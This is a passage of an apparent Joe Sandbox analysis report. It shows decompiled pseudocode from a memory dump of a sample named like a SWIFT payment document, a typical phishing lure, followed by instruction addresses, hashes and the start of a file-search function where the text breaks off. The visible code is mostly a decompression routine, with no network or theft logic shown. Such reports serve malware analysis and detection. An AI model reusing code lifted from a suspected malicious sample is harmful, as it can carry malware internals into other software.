							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406d5f
0x00406d5f
0x00406d64
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x00406d66
0x00406d66
0x00406d6a
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d8b
0x00406d92
0x00406d95
0x00406da0
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406daf
0x00406dcd
0x00406dcf
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406ff4
0x00406ff7
0x00406f9a
0x00406fa0
0x00000000
0x00000000
0x00000000
0x00406ff9
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f97
0x00000000
0x00406f97
0x00406db1
0x00406db1
0x00406db4
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406ea3
0x00406ea6
0x00406e1d
0x00406e1d
0x00406e23
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f30
0x00406f33
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed3
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3e
0x00406f3e
0x00406f41
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x00406e2f
0x00000000
0x00000000
0x00000000
0x00406eac
0x00406df8
0x00406dfc
0x00407569
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e1a
0x00000000
0x00406e1a
0x00406ea6
0x00406daf
0x00406be3
0x00406be3
0x00406bec
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
